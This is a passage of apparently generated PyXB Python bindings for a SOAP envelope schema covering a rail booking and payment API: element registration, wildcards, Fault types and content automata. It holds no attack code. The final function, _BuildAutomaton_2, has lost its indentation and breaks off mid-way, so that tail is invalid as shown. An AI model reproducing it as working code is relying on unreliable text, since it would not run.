    __retrieveCancellationSummaryResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'retrieveCancellationSummaryResponse'), 'retrieveCancellationSummaryResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__retrieveCancellationSummaryResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 72, 12), )
    retrieveCancellationSummaryResponse = property(__retrieveCancellationSummaryResponse.value, __retrieveCancellationSummaryResponse.set, None, None)
    # Unlike Header, the Body wildcard admits elements/attributes from ANY
    # namespace (lax validation), so unknown payloads do not fail parsing.
    _AttributeWildcard = pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=pyxb.binding.content.Wildcard.NC_any)
    _HasWildcardElement = True
    # Register every declared element under its expanded name for lookup
    # during document parsing/serialization.
    _ElementMap.update({
        __pointToPointShoppingRequest.name() : __pointToPointShoppingRequest,
        __pointToPointShoppingResponse.name() : __pointToPointShoppingResponse,
        __travelPassShoppingRequest.name() : __travelPassShoppingRequest,
        __travelPassShoppingResponse.name() : __travelPassShoppingResponse,
        __scheduleSearchRequest.name() : __scheduleSearchRequest,
        __scheduleSearchResponse.name() : __scheduleSearchResponse,
        __addPaymentRequest.name() : __addPaymentRequest,
        __addPaymentResponse.name() : __addPaymentResponse,
        __authenticatePayerRequest.name() : __authenticatePayerRequest,
        __authenticatePayerResponse.name() : __authenticatePayerResponse,
        __cancelBookingRecordRequest.name() : __cancelBookingRecordRequest,
        __cancelBookingRecordResponse.name() : __cancelBookingRecordResponse,
        __claimValueDocumentRequest.name() : __claimValueDocumentRequest,
        __claimValueDocumentResponse.name() : __claimValueDocumentResponse,
        __confirmBookingRecordRequest.name() : __confirmBookingRecordRequest,
        __confirmBookingRecordResponse.name() : __confirmBookingRecordResponse,
        __createBookingRecordRequest.name() : __createBookingRecordRequest,
        __createBookingRecordResponse.name() : __createBookingRecordResponse,
        __recordFinancialTransactionRequest.name() : __recordFinancialTransactionRequest,
        __recordFinancialTransactionResponse.name() : __recordFinancialTransactionResponse,
        __redeliverValueDocumentRequest.name() : __redeliverValueDocumentRequest,
        __redeliverValueDocumentResponse.name() : __redeliverValueDocumentResponse,
        __retrieveBookingRecordRequest.name() : __retrieveBookingRecordRequest,
        __retrieveBookingRecordResponse.name() : __retrieveBookingRecordResponse,
        __returnValueDocumentRequest.name() : __returnValueDocumentRequest,
        __returnValueDocumentResponse.name() : __returnValueDocumentResponse,
        __searchBookingRecordsRequest.name() : __searchBookingRecordsRequest,
        __searchBookingRecordsResponse.name() : __searchBookingRecordsResponse,
        __updateBookingRecordRequest.name() : __updateBookingRecordRequest,
        __updateBookingRecordResponse.name() : __updateBookingRecordResponse,
        __refundBookingRecordRequest.name() : __refundBookingRecordRequest,
        __refundBookingRecordResponse.name() : __refundBookingRecordResponse,
        __validateBookingRecordInformationRequest.name() : __validateBookingRecordInformationRequest,
        __validateBookingRecordInformationResponse.name() : __validateBookingRecordInformationResponse,
        __generatePaymentTokenRequest.name() : __generatePaymentTokenRequest,
        __generatePaymentTokenResponse.name() : __generatePaymentTokenResponse,
        __deletePaymentTokenRequest.name() : __deletePaymentTokenRequest,
        __deletePaymentTokenResponse.name() : __deletePaymentTokenResponse,
        __retrieveCancellationSummaryRequest.name() : __retrieveCancellationSummaryRequest,
        __retrieveCancellationSummaryResponse.name() : __retrieveCancellationSummaryResponse
    })
    _AttributeMap.update({
    })

Namespace.addCategoryObject('typeBinding', 'Body', Body_)
# Complex type {http://schemas.xmlsoap.org/soap/envelope/}Fault with content type ELEMENT_ONLY
class Fault_ (pyxb.binding.basis.complexTypeDefinition):
    """Fault reporting structure"""
    # Generated binding for the SOAP 1.1 Fault type: the fixed four-part
    # error structure (faultcode, faultstring, faultactor, detail).
    # NOTE(review): generated from all.xsd — regenerate rather than hand-edit.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Fault')
    _XSDLocation = pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 107, 0)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType

    # Element faultcode uses Python identifier faultcode
    __faultcode = pyxb.binding.content.ElementDeclaration(
        pyxb.namespace.ExpandedName(None, 'faultcode'), 'faultcode',
        '__httpschemas_xmlsoap_orgsoapenvelope_Fault__faultcode', False,
        pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 112, 8), )
    faultcode = property(__faultcode.value, __faultcode.set, None, None)

    # Element faultstring uses Python identifier faultstring
    __faultstring = pyxb.binding.content.ElementDeclaration(
        pyxb.namespace.ExpandedName(None, 'faultstring'), 'faultstring',
        '__httpschemas_xmlsoap_orgsoapenvelope_Fault__faultstring', False,
        pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 113, 8), )
    faultstring = property(__faultstring.value, __faultstring.set, None, None)

    # Element faultactor uses Python identifier faultactor
    __faultactor = pyxb.binding.content.ElementDeclaration(
        pyxb.namespace.ExpandedName(None, 'faultactor'), 'faultactor',
        '__httpschemas_xmlsoap_orgsoapenvelope_Fault__faultactor', False,
        pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 114, 8), )
    faultactor = property(__faultactor.value, __faultactor.set, None, None)

    # Element detail uses Python identifier detail
    __detail = pyxb.binding.content.ElementDeclaration(
        pyxb.namespace.ExpandedName(None, 'detail'), 'detail',
        '__httpschemas_xmlsoap_orgsoapenvelope_Fault__detail', False,
        pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 115, 8), )
    detail = property(__detail.value, __detail.set, None, None)

    # Index the declared children by expanded name for parse/serialize lookup.
    _ElementMap.update({
        __faultcode.name() : __faultcode,
        __faultstring.name() : __faultstring,
        __faultactor.name() : __faultactor,
        __detail.name() : __detail
    })
    _AttributeMap.update({})

# Register the type binding so it is discoverable through the namespace.
Namespace.addCategoryObject('typeBinding', 'Fault', Fault_)
# Complex type {http://schemas.xmlsoap.org/soap/envelope/}detail with content type ELEMENT_ONLY
class detail (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://schemas.xmlsoap.org/soap/envelope/}detail with content type ELEMENT_ONLY"""
    # Carrier for application-specific fault information: the type declares
    # no named children; content from any namespace is admitted through the
    # lax wildcard flagged below.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'detail')
    _XSDLocation = pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 118, 0)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    _HasWildcardElement = True
    _AttributeWildcard = pyxb.binding.content.Wildcard(
        process_contents=pyxb.binding.content.Wildcard.PC_lax,
        namespace_constraint=pyxb.binding.content.Wildcard.NC_any)
    _ElementMap.update({})
    _AttributeMap.update({})

# Register the type binding so it is discoverable through the namespace.
Namespace.addCategoryObject('typeBinding', 'detail', detail)
# Module-level element bindings: tie each global XSD element declaration to
# its complex-type class above and register it in the namespace category map
# so documents can be created/parsed by element name.
Envelope = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Envelope'), Envelope_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 14, 4))
Namespace.addCategoryObject('elementBinding', Envelope.name().localName(), Envelope)

Header = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Header'), Header_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 23, 4))
Namespace.addCategoryObject('elementBinding', Header.name().localName(), Header)

Body = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Body'), Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 30, 4))
Namespace.addCategoryObject('elementBinding', Body.name().localName(), Body)

Fault = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Fault'), Fault_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 106, 0))
Namespace.addCategoryObject('elementBinding', Fault.name().localName(), Fault)

# Attach Header and Body as scoped element declarations of the Envelope
# complex type (they are its two declared children).
Envelope_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Header'), Header_, scope=Envelope_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 23, 4)))
Envelope_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Body'), Body_, scope=Envelope_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 30, 4)))
def _BuildAutomaton ():
    """Build the FAC content-model automaton for Envelope_.

    Self-removing helper: PyXB deletes it from the module namespace as soon
    as it runs, since the automaton is constructed exactly once.
    """
    global _BuildAutomaton
    del _BuildAutomaton
    import pyxb.utils.fac as fac

    xsd = '/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd'

    # Occurrence counters: optional Header (0..1) and repeatable trailing
    # wildcard content (0..unbounded).
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location(xsd, 17, 12))
    cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location(xsd, 19, 12))
    counters = {cc_0, cc_1}

    # State 0: the optional Header element (non-accepting).
    header_use = pyxb.binding.content.ElementUse(
        Envelope_._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Header')),
        pyxb.utils.utility.Location(xsd, 17, 12))
    st_0 = fac.State(header_use, is_initial=True, final_update=None, is_unordered_catenation=False)

    # State 1: the Body element (accepting).
    body_use = pyxb.binding.content.ElementUse(
        Envelope_._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Body')),
        pyxb.utils.utility.Location(xsd, 18, 12))
    st_1 = fac.State(body_use, is_initial=True, final_update=set(), is_unordered_catenation=False)

    # State 2: lax wildcard for any namespace except the SOAP envelope
    # namespace, repeatable (accepting).
    wildcard_use = pyxb.binding.content.WildcardUse(
        pyxb.binding.content.Wildcard(
            process_contents=pyxb.binding.content.Wildcard.PC_lax,
            namespace_constraint=(pyxb.binding.content.Wildcard.NC_not, 'http://schemas.xmlsoap.org/soap/envelope/')),
        pyxb.utils.utility.Location(xsd, 19, 12))
    st_2 = fac.State(wildcard_use, is_initial=False,
                     final_update={fac.UpdateInstruction(cc_1, False)},
                     is_unordered_catenation=False)

    states = [st_0, st_1, st_2]

    # Transitions: Header may repeat under cc_0 or hand off to Body; Body
    # moves to the wildcard tail; the wildcard loops under cc_1.
    st_0._set_transitionSet([
        fac.Transition(st_0, [fac.UpdateInstruction(cc_0, True)]),
        fac.Transition(st_1, [fac.UpdateInstruction(cc_0, False)]),
    ])
    st_1._set_transitionSet([
        fac.Transition(st_2, []),
    ])
    st_2._set_transitionSet([
        fac.Transition(st_2, [fac.UpdateInstruction(cc_1, True)]),
    ])
    # nullable=False: an Envelope must contain at least a Body.
    return fac.Automaton(states, counters, False, containing_state=None)
Envelope_._Automaton = _BuildAutomaton()
def _BuildAutomaton_ ():
    """Build the FAC content-model automaton for Header_.

    Self-removing helper: PyXB deletes it from the module namespace as soon
    as it runs, since the automaton is constructed exactly once.
    """
    global _BuildAutomaton_
    del _BuildAutomaton_
    import pyxb.utils.fac as fac

    xsd = '/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd'

    # Single repeatable particle: lax wildcard over any namespace except the
    # SOAP envelope namespace (0..unbounded).
    cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location(xsd, 26, 12))
    wildcard_use = pyxb.binding.content.WildcardUse(
        pyxb.binding.content.Wildcard(
            process_contents=pyxb.binding.content.Wildcard.PC_lax,
            namespace_constraint=(pyxb.binding.content.Wildcard.NC_not, 'http://schemas.xmlsoap.org/soap/envelope/')),
        pyxb.utils.utility.Location(xsd, 26, 12))
    st_0 = fac.State(wildcard_use, is_initial=True,
                     final_update={fac.UpdateInstruction(cc_0, False)},
                     is_unordered_catenation=False)
    # The wildcard loops on itself while cc_0 permits.
    st_0._set_transitionSet([
        fac.Transition(st_0, [fac.UpdateInstruction(cc_0, True)]),
    ])
    # nullable=True: a Header element may be empty.
    return fac.Automaton([st_0], {cc_0}, True, containing_state=None)
Header_._Automaton = _BuildAutomaton_()
# Scoped element declarations for the SOAP Body: each request/response pair is
# an unqualified local element whose type comes from an imported binding module.
# Shopping and schedule-search operations (silvershop bindings).
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'pointToPointShoppingRequest'), _ImportedBinding_silvershop.PointToPointShoppingRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 33, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'pointToPointShoppingResponse'), _ImportedBinding_silvershop.PointToPointShoppingResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 34, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'travelPassShoppingRequest'), _ImportedBinding_silvershop.TravelPassShoppingRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 35, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'travelPassShoppingResponse'), _ImportedBinding_silvershop.TravelPassShoppingResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 36, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'scheduleSearchRequest'), _ImportedBinding_silvershop.ScheduleSearchRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 37, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'scheduleSearchResponse'), _ImportedBinding_silvershop.ScheduleSearchResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 38, 12)))
# Booking, payment and value-document operations (silverbook bindings).
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'addPaymentRequest'), _ImportedBinding_silverbook.AddPaymentRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 39, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'addPaymentResponse'), _ImportedBinding_silverbook.AddPaymentResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 40, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'authenticatePayerRequest'), _ImportedBinding_silverbook.AuthenticatePayerRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 41, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'authenticatePayerResponse'), _ImportedBinding_silverbook.AuthenticatePayerResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 42, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'cancelBookingRecordRequest'), _ImportedBinding_silverbook.CancelBookingRecordRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 43, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'cancelBookingRecordResponse'), _ImportedBinding_silverbook.CancelBookingRecordResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 44, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'claimValueDocumentRequest'), _ImportedBinding_silverbook.ClaimValueDocumentRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 45, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'claimValueDocumentResponse'), _ImportedBinding_silverbook.ClaimValueDocumentResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 46, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'confirmBookingRecordRequest'), _ImportedBinding_silverbook.ConfirmBookingRecordRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 47, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'confirmBookingRecordResponse'), _ImportedBinding_silverbook.ConfirmBookingRecordResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 48, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'createBookingRecordRequest'), _ImportedBinding_silverbook.CreateBookingRecordRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 49, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'createBookingRecordResponse'), _ImportedBinding_silverbook.CreateBookingRecordResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 50, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'recordFinancialTransactionRequest'), _ImportedBinding_silverbook.RecordFinancialTransactionRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 51, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'recordFinancialTransactionResponse'), _ImportedBinding_silverbook.RecordFinancialTransactionResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 52, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'redeliverValueDocumentRequest'), _ImportedBinding_silverbook.RedeliverValueDocumentRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 53, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'redeliverValueDocumentResponse'), _ImportedBinding_silverbook.RedeliverValueDocumentResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 54, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'retrieveBookingRecordRequest'), _ImportedBinding_silverbook.RetrieveBookingRecordRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 55, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'retrieveBookingRecordResponse'), _ImportedBinding_silverbook.RetrieveBookingRecordResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 56, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'returnValueDocumentRequest'), _ImportedBinding_silverbook.ReturnValueDocumentRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 57, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'returnValueDocumentResponse'), _ImportedBinding_silverbook.ReturnValueDocumentResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 58, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'searchBookingRecordsRequest'), _ImportedBinding_silverbook.SearchBookingRecordsRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 59, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'searchBookingRecordsResponse'), _ImportedBinding_silverbook.SearchBookingRecordsResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 60, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'updateBookingRecordRequest'), _ImportedBinding_silverbook.UpdateBookingRecordRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 61, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'updateBookingRecordResponse'), _ImportedBinding_silverbook.UpdateBookingRecordResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 62, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'refundBookingRecordRequest'), _ImportedBinding_silverbook.RefundBookingRecordRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 63, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'refundBookingRecordResponse'), _ImportedBinding_silverbook.RefundBookingRecordResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 64, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'validateBookingRecordInformationRequest'), _ImportedBinding_silverbook.ValidateBookingRecordInformationRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 65, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'validateBookingRecordInformationResponse'), _ImportedBinding_silverbook.ValidateBookingRecordInformationResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 66, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'generatePaymentTokenRequest'), _ImportedBinding_silverbook.GeneratePaymentTokenRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 67, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'generatePaymentTokenResponse'), _ImportedBinding_silverbook.GeneratePaymentTokenResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 68, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'deletePaymentTokenRequest'), _ImportedBinding_silverbook.DeletePaymentTokenRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 69, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'deletePaymentTokenResponse'), _ImportedBinding_silverbook.DeletePaymentTokenResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 70, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'retrieveCancellationSummaryRequest'), _ImportedBinding_silverbook.RetrieveCancellationSummaryRequestType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 71, 12)))
Body_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(None, 'retrieveCancellationSummaryResponse'), _ImportedBinding_silverbook.RetrieveCancellationSummaryResponseType, scope=Body_, location=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 72, 12)))
def _BuildAutomaton_2 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_2
del _BuildAutomaton_2
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 33, 12))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 34, 12))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 35, 12))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 36, 12))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 37, 12))
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 38, 12))
counters.add(cc_5)
cc_6 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 39, 12))
counters.add(cc_6)
cc_7 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 40, 12))
counters.add(cc_7)
cc_8 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 41, 12))
counters.add(cc_8)
cc_9 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 42, 12))
counters.add(cc_9)
cc_10 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 43, 12))
counters.add(cc_10)
cc_11 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 44, 12))
counters.add(cc_11)
cc_12 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 45, 12))
counters.add(cc_12)
cc_13 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 46, 12))
counters.add(cc_13)
cc_14 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 47, 12))
counters.add(cc_14)
cc_15 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 48, 12))
counters.add(cc_15)
cc_16 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 49, 12))
counters.add(cc_16)
cc_17 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 50, 12))
counters.add(cc_17)
cc_18 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 51, 12))
counters.add(cc_18)
cc_19 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 52, 12))
counters.add(cc_19)
cc_20 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 53, 12))
counters.add(cc_20)
cc_21 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 54, 12))
